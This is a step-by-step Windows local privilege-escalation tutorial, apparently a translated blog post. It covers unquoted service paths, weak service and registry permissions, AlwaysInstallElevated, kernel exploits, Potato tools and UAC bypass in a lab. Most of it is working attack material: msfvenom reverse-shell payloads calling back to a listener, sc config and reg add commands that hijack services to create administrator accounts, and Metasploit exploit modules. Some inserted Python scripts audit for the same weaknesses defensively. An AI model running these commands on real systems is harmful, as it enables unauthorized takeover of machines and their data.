Contents

  • Privilege escalation overview
    • Types of Windows privilege escalation
    • Preparation
      • Manually configuring the vulnerable service
  • Privilege escalation
    • Commonly used MSF privilege-escalation commands
    • Windows trusted service path (insecure file/folder permissions)
      • Cause of the vulnerability
      • Exploitation conditions
      • Attack demonstration
      • MSF exploitation
    • Insecure service permissions
      • Cause of the vulnerability
      • Exploitation conditions
      • Attack demonstration
      • MSF exploitation
    • Insecure registry permissions
      • Cause of the vulnerability
      • Exploitation conditions
      • Attack demonstration
      • Commonly exploited registry keys
    • Always Install Elevated
      • Exploitation conditions
      • Attack demonstration
      • MSF exploitation
    • Windows kernel vulnerabilities
      • Open-source scripts
      • MSF exploitation
    • Using the Potato vulnerability
      • Potato variants
    • Bypassing User Account Control (bypassUAC)
      • Demonstration
      • BypassUAC variants

Privilege escalation overview

Windows is a mature system with a powerful permission management model, and most mature applications also come with a fairly complete permission hierarchy. The permissions we obtain during a penetration test are usually those of a standard user or of an administrator; Windows privilege escalation mainly means raising our permissions to those of the system administrator (SYSTEM). This can be done not only by exploiting system vulnerabilities but also by exploiting flaws in installed software. Permission levels: standard user < administrator (Administrator, or another user in the Administrators group) < system administrator / super administrator (SYSTEM). Windows vulnerability summary: github.com/SecWiki/win…

Types of Windows privilege escalation

Privilege escalation is generally divided into two kinds:

  1. Local privilege escalation: a user with low privileges exploits a vulnerability to raise their permissions to administrator level.
  2. Remote privilege escalation: administrator rights are obtained directly during a remote attack.

The rest of this article deals with local privilege escalation.

Preparation

Before starting with Windows privilege escalation, you had better know the following:

  1. Windows information gathering and commonly used penetration-testing commands: xunmi.blog.csdn.net/article/det…
  2. How to use Metasploit, basics (auxiliary, exploits, meterpreter): xunmi.blog.csdn.net/article/det…
  3. How to use Metasploit, advanced (msfvenom = payloads + encoders): xunmi.blog.csdn.net/article/det…

In a real penetration-testing environment, knowing the common Windows commands and being proficient with MSF and CS raises both efficiency and success rate considerably.

The premise of local privilege escalation is that we already have a shell on the target as a low-privileged user. Here my target runs Windows 7; its information is generally shown below.



At this point I have the target in MSF and have tried the named-pipe technique (getsystem) to escalate, which failed. (Roughly, the named-pipe technique creates a service process with system-administrator rights and then establishes a pipe connection with that service process, so that administrative privileges can be obtained through it.) Most of the flaws it relies on have been patched on current systems, so that route is running out of options.

Manually configuring the vulnerable service

  1. Create the folder C:\Program Files\A app\A exe\ (this path does not exist by default) and put a file named myexe.exe in it; myexe.exe can simply be a new text file renamed to .exe. Then grant Full control on the "A app" folder to all users (Everyone). If Everyone is not listed, add it manually.
  2. In CMD, create a service: sc create "Test Service" binPath= "C:\Program Files\A app\A exe\myexe.exe" start= auto
  3. Open the registry (press Win+R and type regedit) and find the created service at HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Test Service
  4. Grant Everyone full control on that key as well.

Privilege escalation

By default the user on Windows 7 is an administrator, so to simulate a real environment, first create a test account with standard-user rights in the account management center.

Commonly used MSF privilege-escalation commands

# incognito must be loaded inside a session
load incognito
# list the tokens currently available
list_tokens -u
# impersonate a user
impersonate_token "Username"

Windows trusted service path (insecure file/folder permissions)

Cause of the vulnerability

This vulnerability is mostly man-made: usually the administrator or the software installer configured the service path improperly. The root cause is that when the service binary's path contains spaces and is not enclosed in quotation marks, Windows resolves it ambiguously. Since Windows services usually run with system-administrator (SYSTEM) permissions, if we can get our own program run in place of the service binary, we obtain system-administrator privileges. For example:

# a system service has the path
C:\Program Files\Firefox Developer Edition\firefox.exe
# this path is ambiguous; Windows will try, in order,
C:\Program.exe
C:\Program Files\Firefox.exe
C:\Program Files\Firefox Developer.exe
C:\Program Files\Firefox Developer Edition\firefox.exe

First, run the following command in the target shell. If a service item has spaces in its path and the path is not enclosed in quotation marks, that service is vulnerable.

wmic service get name,displayname,pathname,startmode
# quick filter: auto-start services outside C:\Windows whose path is unquoted
wmic service get name,displayname,pathname,startmode|findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr/i /v """
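The detection step above can be automated offline. The following Python script is an added example, not code from the article or from MSF: it parses the CSV form of the same wmic query (`wmic service get name,pathname,startmode /format:csv`, assumed here to print a leading blank line and unquoted field values, as wmic does), flags every unquoted path containing spaces outside C:\Windows, lists the shorter file names the service control manager would try first (the same ambiguity shown for firefox.exe above), and prints the `sc config` command that fixes the service by quoting its path. The service rows are constructed sample data.

```python
import csv
import io
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Constructed sample in the shape of `wmic service get name,pathname,startmode /format:csv`:
# wmic prints a leading blank line, sorts the columns alphabetically after "Node" (the host name)
# and writes field values verbatim, without CSV quoting.
SAMPLE_WMIC_CSV = '''
Node,Name,PathName,StartMode
LAB-PC,Dhcp,C:\\Windows\\system32\\svchost.exe -k LocalServiceNetworkRestricted,Auto
LAB-PC,Test Service,C:\\Program Files\\A app\\A exe\\myexe.exe,Auto
LAB-PC,FirefoxDev,"C:\\Program Files\\Firefox Developer Edition\\firefox.exe",Auto
LAB-PC,VendorTool,C:\\Program Files\\Some Vendor\\tool.exe -service,Manual
'''

EXE_RE = re.compile(r"\.exe", re.IGNORECASE)


@dataclass
class Finding:
    name: str
    start_mode: str
    binary_path: str                                      # executable part of the unquoted command line
    arguments: str                                        # whatever followed the executable
    candidates: List[str] = field(default_factory=list)   # files the SCM would try before the real one


def split_command(command: str) -> Optional[Tuple[str, str]]:
    """Split an unquoted service command line into (executable, arguments) at the first '.exe'."""
    m = EXE_RE.search(command)
    if not m:
        return None
    return command[: m.end()], command[m.end():]


def hijack_candidates(binary_path: str) -> List[str]:
    """Each space in an unquoted path yields one shorter name that the service control manager
    tries first, e.g. 'C:\\Program Files\\A app\\x.exe' -> 'C:\\Program.exe', 'C:\\Program Files\\A.exe'.
    A defender must make sure the parent directory of each candidate is not writable by ordinary users."""
    return [binary_path[:i] + ".exe" for i, ch in enumerate(binary_path) if ch == " "]


def audit_services(csv_text: str, only_auto: bool = False) -> List[Finding]:
    """Flag services whose executable path is unquoted, contains spaces and lies outside C:\\Windows
    (the same exclusion the findstr one-liner applies)."""
    # QUOTE_NONE keeps a leading double quote in PathName visible instead of stripping it.
    reader = csv.DictReader(io.StringIO(csv_text.lstrip("\r\n")), quoting=csv.QUOTE_NONE)
    findings: List[Finding] = []
    for row in reader:
        path = (row.get("PathName") or "").strip()
        if not path or path.startswith('"'):
            continue                                      # quoted: the SCM parses it unambiguously
        parts = split_command(path)
        if parts is None:
            continue
        binary, args = parts
        if " " not in binary or binary.lower().startswith("c:\\windows\\"):
            continue
        mode = (row.get("StartMode") or "").strip()
        if only_auto and mode.lower() != "auto":
            continue
        findings.append(Finding(row["Name"], mode, binary, args, hijack_candidates(binary)))
    return findings


def remediation_command(f: Finding) -> str:
    """The fix is to quote the executable path inside binPath= (inner quotes escaped for cmd)."""
    return f'sc config "{f.name}" binPath= "\\"{f.binary_path}\\"{f.arguments}"'


if __name__ == "__main__":
    for f in audit_services(SAMPLE_WMIC_CSV):
        print(f"[{f.start_mode}] {f.name}: {f.binary_path}")
        for c in f.candidates:
            print("    would be run first if present:", c)
        print("    fix:", remediation_command(f))
```

Run it against real output by redirecting the wmic CSV to a file and passing its contents to audit_services; the candidate list is exactly the set of locations whose parent directories need an icacls check, which is the check the next section performs by hand.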

Exploitation conditions

The path we will use here is C:\Program Files\A app\A exe\myexe.exe

First check that our current user has sufficient permissions on the target path:

icacls "C:\Program Files\A app"

If the output shows, for a group our user belongs to, the attributes F (full control), CI (container inherit: subfolders inherit the permission) and OI (object inherit: files inherit the permission), we have enough authority to manipulate it.

Attack demonstration

From the path above we can see that we can exploit the path flaw by making Windows run a file named A.exe, so we create an attack payload and name it A.exe

# my target here is 32-bit, so this payload can be used directly; for a 64-bit target use windows/x64/meterpreter/reverse_tcp
# this command is executed outside msfconsole
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.200 LPORT=9999 -f exe -o A.exe
# start the listener in MSF (this command is executed in msfconsole)
handler -H 192.168.1.200 -P 9999 -p windows/meterpreter/reverse_tcp
# enter the non-admin session on the target (if you don't know how, read the MSF basics first)
sessions 5
# upload the file to the target folder (executed in the session)
upload A.exe "C:\Program Files\A app"
# restart the service (executed in the target shell; type shell in the session to get one)
# if you get an "access denied" message, this service cannot be used on this machine; try another service
sc stop "Test Service"
sc start "Test Service"

Under normal circumstances the session is forcibly disconnected shortly after it connects. This is a Windows safety mechanism at work: our service does not report itself as started correctly, so the service control manager kills it soon after start. To avoid being cut off we need to migrate into another process; the listener can perform the migration automatically:

# load the listener module
use exploit/multi/handler
# migrate automatically into a new process as soon as a session opens
set autorunscript migrate -f
# general settings
set LHOST 192.168.1.200
set LPORT 9999
# the payload must be exactly the same as the one used to build A.exe, otherwise the connection fails
set payload windows/meterpreter/reverse_tcp
# run the listener; the migration script runs when the session arrives
run



PS: above I used the space in the path, but if you have write permission you can also replace the specified binary itself with your Trojan; this is called insecure file/folder permissions. For example, we could directly replace myexe.exe. Usually, though, such a file is being run by the system and cannot be replaced, so I will not do that here.

MSF exploitation

In addition to the manual steps above, we can also use an MSF module to exploit the trusted service path automatically:

# load the trusted service path escalation module
use exploit/windows/local/unquoted_service_path
# select the session to escalate
set session 1
# run
run

This module quickly finds a service path it can exploit; in my case the service restart failed because of some configuration errors.

Insecure service permissions

Cause of the vulnerability

This also abuses a system service, but unlike the path-space issue above, here the misconfiguration gives us permission to modify the target service's executable path, so we can make it run a Trojan of our choosing.

Exploitation conditions

accesschk, the permission query tool, can be downloaded from docs.microsoft.com/zh-cn/sysin… (an official Microsoft Sysinternals tool). Usage:

# choose the 64-bit or 32-bit version depending on the current system
accesschk.exe -ucqv "Username" * /accepteula
accesschk64.exe -ucqv "Username" * /accepteula
# then look for services on which the user has full control (SERVICE_ALL_ACCESS)

SERVICE_ALL_ACCESS: full control over all properties of this service.
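accesschk summarises the ACL for you; to see the same information from the service's DACL itself, and to audit many services from a script, the following Python code is an added example (not from the article or from Sysinternals). It parses the SDDL string that `sc sdshow <service>` prints, maps the two-letter SDDL right codes onto the SERVICE_* names accesschk shows, and reports any access-allowed ACE that gives Everyone, Authenticated Users, BUILTIN\Users or a SID you pass in the rights to reconfigure the service (SERVICE_CHANGE_CONFIG, WRITE_DAC, WRITE_OWNER) or merely to restart it. The SDDL strings at the bottom are constructed samples: a normally configured service and one granting Everyone SERVICE_ALL_ACCESS, like the lab's Test Service.

```python
import re
from typing import Dict, List, Tuple

# SDDL two-letter right codes as interpreted for service objects (bit values from the Windows SDK);
# the service-specific bits 0x1..0x100 are what accesschk prints as SERVICE_* names.
SERVICE_RIGHTS: Dict[str, Tuple[int, str]] = {
    "CC": (0x00001, "SERVICE_QUERY_CONFIG"),
    "DC": (0x00002, "SERVICE_CHANGE_CONFIG"),
    "LC": (0x00004, "SERVICE_QUERY_STATUS"),
    "SW": (0x00008, "SERVICE_ENUMERATE_DEPENDENTS"),
    "RP": (0x00010, "SERVICE_START"),
    "WP": (0x00020, "SERVICE_STOP"),
    "DT": (0x00040, "SERVICE_PAUSE_CONTINUE"),
    "LO": (0x00080, "SERVICE_INTERROGATE"),
    "CR": (0x00100, "SERVICE_USER_DEFINED_CONTROL"),
    "SD": (0x10000, "DELETE"),
    "RC": (0x20000, "READ_CONTROL"),
    "WD": (0x40000, "WRITE_DAC"),
    "WO": (0x80000, "WRITE_OWNER"),
    "GA": (0x10000000, "GENERIC_ALL"),
    "GX": (0x20000000, "GENERIC_EXECUTE"),
    "GW": (0x40000000, "GENERIC_WRITE"),
    "GR": (0x80000000, "GENERIC_READ"),
}
SERVICE_ALL_ACCESS = 0xF01FF

# Rights that let the holder change what the service executes or rewrite its ACL ...
TAKEOVER_RIGHTS = {"SERVICE_CHANGE_CONFIG", "WRITE_DAC", "WRITE_OWNER", "GENERIC_ALL", "GENERIC_WRITE"}
# ... and rights that only let the holder bounce the service (enough to trigger a planted binary).
RESTART_RIGHTS = {"SERVICE_START", "SERVICE_STOP"}

# Well-known SDDL SID abbreviations for principals that every local user falls under.
LOW_PRIV_SIDS = {"WD": "Everyone", "AU": "Authenticated Users", "BU": "BUILTIN\\Users",
                 "IU": "Interactive Users", "BG": "BUILTIN\\Guests", "AN": "Anonymous"}

ACE_RE = re.compile(r"\(([^)]*)\)")


def rights_mask(field: str) -> int:
    """Turn an ACE rights field ('CCDCLC...' or hex such as '0xF01FF') into an access mask."""
    if field.lower().startswith("0x"):
        return int(field, 16)
    mask = 0
    for i in range(0, len(field), 2):
        code = field[i:i + 2]
        if code not in SERVICE_RIGHTS:
            raise ValueError(f"unknown SDDL right code {code!r}")
        mask |= SERVICE_RIGHTS[code][0]
    return mask


def right_names(mask: int) -> List[str]:
    return [name for bit, name in SERVICE_RIGHTS.values() if (mask & bit) == bit]


def dacl_aces(sddl: str) -> List[Tuple[str, str, str]]:
    """Return (ace_type, rights_field, sid) for each ACE of the DACL; the S: (audit) part is ignored."""
    m = re.search(r"D:[A-Z]*((?:\([^)]*\))*)", sddl)
    if not m:
        return []
    aces = []
    for ace in ACE_RE.findall(m.group(1)):
        parts = ace.split(";")               # type;flags;rights;object_guid;inherit_guid;sid
        if len(parts) < 6:
            raise ValueError(f"malformed ACE {ace!r}")
        aces.append((parts[0], parts[2], parts[5]))
    return aces


def audit_service_sddl(service: str, sddl: str, extra_sids=()) -> List[dict]:
    """Report access-allowed ACEs that give a low-privileged principal (or one of extra_sids,
    e.g. the SID of the user under test) takeover or restart rights on the service.
    Deny ACEs are not evaluated, so confirm a hit with accesschk before acting on it."""
    findings = []
    for ace_type, rights_field, sid in dacl_aces(sddl):
        if ace_type != "A" or (sid not in LOW_PRIV_SIDS and sid not in extra_sids):
            continue
        mask = rights_mask(rights_field)
        names = set(right_names(mask))
        takeover, restart = sorted(names & TAKEOVER_RIGHTS), sorted(names & RESTART_RIGHTS)
        if takeover or restart:
            findings.append({"service": service, "principal": LOW_PRIV_SIDS.get(sid, sid),
                             "all_access": (mask & SERVICE_ALL_ACCESS) == SERVICE_ALL_ACCESS,
                             "takeover": takeover, "restart": restart})
    return findings


# Constructed SDDL strings in the shape `sc sdshow <service>` prints (not captured from the lab).
SAFE_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
             "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")
# Everyone holds SERVICE_ALL_ACCESS, the situation accesschk reports for the lab's "Test Service".
WEAK_SDDL = ("D:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)(A;;CCLCSWRPWPDTLOCRRC;;;SY)"
             "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)")
HEX_SDDL = "D:(A;;0xF01FF;;;AU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)"

if __name__ == "__main__":
    for name, sddl in [("Dhcp", SAFE_SDDL), ("Test Service", WEAK_SDDL), ("VendorSvc", HEX_SDDL)]:
        for hit in audit_service_sddl(name, sddl):
            print(hit)
```

A service where only restart rights are flagged is still worth fixing when combined with the unquoted-path or file-permission issues from the previous section, since restarting is what makes a planted binary run.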



Here I use the service I created above.

First look at the details of this service: sc qc "Test Service"

We focus on BINARY_PATH_NAME, the path of the service's executable. Although I call it a path, any command can be put here, and it will be run as the system administrator.

Attack demonstration

There are some problems with my environment configuration, so the standard user could not operate the service. To make the demonstration easier, I run CMD as administrator. Besides having the target run our Trojan as a high-privilege user as shown above, we can also use the following commands to create a new administrator user and so achieve the escalation:

# create user root with password toor
sc config "Test Service" binpath= "net user root toor /add"
# restart the service
sc stop "Test Service"
sc start "Test Service"
# add the new user to the Administrators group (the new binpath only runs when the service is started again)
sc config "Test Service" binpath= "net localgroup Administrators root /add"
# it is best to restore the service to its original state at the end
sc config "Test Service" binpath= "C:\Program Files\A app\A exe\myexe.exe"

In this way we obtain a user with administrator rights and indirectly achieve privilege escalation.

MSF exploitation

This can also be done automatically with the MSF module for insecure service permissions:

# load the service permissions module
use exploit/windows/local/service_permissions
# select the session to escalate
set session 1
# run
run

As shown, the privilege escalation succeeded.

Insecure registry permissions

Cause of the vulnerability

Here we again use Test Service as the test target. Similar to the service case above, we modify the ImagePath value of the service's registry key so that a malicious program is executed.

Exploitation conditions

To check registry permissions we need subinacl.exe, but this tool has been removed from Microsoft's official website and I have not found another trusted download source; it can be found on the Internet, and the CSDN download resources should have it (I planned to upload it, but was told the resource already exists).

# when uploading a file to the target, we usually choose the temporary folder
cd %temp%
# upload the tool
upload subinacl.exe
# display the permissions on the Test Service key
.\subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Test Service" /display

If we do not find that the target registry key grants us full control, we cannot proceed to the next step.

Attack demonstration

Here we use an MSF-generated program to create an administrator account.

# build a program that creates a user
msfvenom -p windows/adduser USER=QAQ PASS=1qaz@WSX -f exe -a x86 --platform windows > adduser.exe
# upload it to the target host (if you cannot upload to the current directory, cd %temp% to the target's temporary directory first)
upload adduser.exe
# change the registry value (executed in the shell)
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Test Service" /t REG_EXPAND_SZ /v ImagePath /d "C:\Users\xunmi\AppData\Local\Temp\adduser.exe" /f
# if you have permission, restart the service
sc stop "Test Service"
sc start "Test Service"
# if not, reboot the machine so that the service restarts
shutdown /r /t 0
# you had better restore the original value afterwards
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Test Service" /t REG_EXPAND_SZ /v ImagePath /d "C:\Program Files\A app\A exe\myexe.exe" /f

For convenience I did not reboot here; I restarted the service as administrator, and our specified user came online, with administrator rights.

Commonly exploited registry keys

The following registry keys are commonly exploitable:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunService
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceService
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunService
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnceService

Always Install Elevated

Always Install Elevated is a policy setting that lets any user on the system install MSI packages with system-administrator privileges. It is disabled by default and must be enabled manually.

PS: the Local Group Policy Editor (gpedit.msc), and therefore this vulnerability, only exists on Windows Professional, Enterprise or Server editions. The Windows 7 Home edition I used before did not have it, so I changed my target machine to Windows Server 2016.

Exploitation conditions

First run the following commands; if the output contains AlwaysInstallElevated REG_DWORD 0x1, the system always installs with elevated permissions.

# check whether it is enabled
reg query HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# if it is not enabled, you can enable it manually (lab setup only)
reg add HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1
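To make this check repeatable, the following Python snippet is an added example (not from the article): it parses the output of the two reg query commands above, applies the rule that Windows Installer only honours AlwaysInstallElevated when both the HKCU and HKLM values are 1, and emits the reg delete commands that remove the policy wherever it is set. The reg query outputs are constructed samples in the shape the command prints.

```python
import re
from typing import Dict, List, Optional

POLICY_KEY = r"SOFTWARE\Policies\Microsoft\Windows\Installer"
VALUE_RE = re.compile(r"AlwaysInstallElevated\s+REG_DWORD\s+0x([0-9a-fA-F]+)")


def parse_reg_query(output: str) -> Optional[int]:
    """Extract the AlwaysInstallElevated DWORD from the output of
    `reg query <hive>\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated`.
    Returns None when reg prints its ERROR line because the key or value does not exist."""
    m = VALUE_RE.search(output)
    return int(m.group(1), 16) if m else None


def assess(hkcu_output: str, hklm_output: str) -> Dict[str, object]:
    """Windows Installer honours the policy only when BOTH hives hold the value 1.
    A single hive set to 1 is not yet exploitable but is still reported for clean-up."""
    values = {"HKCU": parse_reg_query(hkcu_output), "HKLM": parse_reg_query(hklm_output)}
    effective = values["HKCU"] == 1 and values["HKLM"] == 1
    remediation: List[str] = [
        f"reg delete {hive}\\{POLICY_KEY} /v AlwaysInstallElevated /f"
        for hive, value in values.items() if value
    ]
    return {"values": values, "effective": effective, "remediation": remediation}


# Constructed reg query outputs in the shape the command prints (key line, then the value line).
QUERY_ENABLED = """
HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer
    AlwaysInstallElevated    REG_DWORD    0x1

"""
QUERY_DISABLED = """
HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer
    AlwaysInstallElevated    REG_DWORD    0x0

"""
QUERY_MISSING = "ERROR: The system was unable to find the specified registry key or value."

if __name__ == "__main__":
    result = assess(QUERY_ENABLED, QUERY_ENABLED)
    print("effective:", result["effective"])
    for cmd in result["remediation"]:
        print("fix:", cmd)
```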

Attack demonstration

Here we need to generate an .msi installation package. MSF currently cannot generate a true .msi program, and a fake .msi does not obtain system-administrator permission, so we use a specialised .msi installer generator, download address: www.exemsi.com/downloads/m…

# generate the executable that the installer will wrap (the file name is arbitrary)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.200 LPORT=7999 -f exe -o "non-toxic and natural.exe"
# start the listener
handler -H 192.168.1.200 -P 7999 -p windows/meterpreter/reverse_tcp

Use the MSI generator to wrap it into an installation package, then transfer the package to the target machine and run it.

MSF exploitation

This can also be done automatically with the MSF Always Install Elevated module:

# load the Always Install Elevated escalation module
use exploit/windows/local/always_install_elevated
# select the session to escalate
set session 1
# run
run

Because my system is a Home edition, it does not support this policy, so the module ran to completion without obtaining system-administrator rights.

Windows kernel vulnerabilities

There are many kinds of Windows kernel vulnerabilities, and testing them one by one is time-consuming and exhausting. The basic idea is to collect the exact version of the target system and the list of installed patches, and then compare that information against the known vulnerabilities.

Open-source scripts

Watson: a patch-scanning tool for the Windows 10 platform: Github.com/rasta-mouse… Sherlock: a Windows vulnerability scanning tool: https://github.com/rasta-mouse/Sherlock

MSF exploitation

MSF vulnerability scanning for Windows generally uses the following two modules:

# list the patches installed on the target
post/windows/gather/enum_patches
# look for local exploits the target may be vulnerable to
post/multi/recon/local_exploit_suggester

For example, using local_exploit_suggester:

# scan the target host automatically for known vulnerabilities
use post/multi/recon/local_exploit_suggester
# select the target session
set session 2
# show details (not shown by default)
set showdescription true
run



So here I use the ms13_053_schlamperei vulnerability found by the scan.

# select the exploit
use exploit/windows/local/ms13_053_schlamperei
# select the session (my previous session 2 was disabled by accident, then I reconnected as session 3; both are the same host)
setg session 3
# start
run



You can see that we have successfully escalated privileges with MSF.

Using the Potato vulnerability

github.com/foxglovesec… Potato privilege escalation principle: https://www.freebuf.com/sectool/98316.html. On Windows 7, Potato relies on the Windows automatic update mechanism and can be triggered almost immediately. Since Potato is written in C#, a .NET environment is required. I have not yet reproduced this way of escalating privileges; I will add it once I have reproduced it successfully.

Potato variants

Origin Potato: github.com/foxglovesec…
RottenPotato & JuicyPotato: github.com/ohpe/juicy-…
RoguePotato: github.com/antonioCoco…
SweetPotato: github.com/CCob/SweetP…

Bypassing User Account Control (bypassUAC)

When a user in the Administrators group performs certain dangerous operations, the system pops up a User Account Control prompt. This prompt blocks many attacks; bypassUAC is a way of getting around this user control.

Demonstration

# load bypassUAC
use exploit/windows/local/bypassuac
# routine settings; the default payload is windows/meterpreter/reverse_tcp
set PAYLOAD <attack payload>
set LHOST <local address>
set LPORT <port>
# select the session on which to use bypassUAC
set session 1
run
# note: the prerequisite for success is that the user we currently control is in the Administrators group
# after bypassUAC succeeds, getsystem obtains the system console
getsystem

BypassUAC variants

In msfconsole, type search bypassuac to see the many bypassUAC variants. If one doesn't work, try others. (The first version of bypassUAC is blocked by antivirus software, so many variants exist to get around it.)

Finally, a comprehensive privilege-escalation tutorial: www.freebuf.com/articles/sy…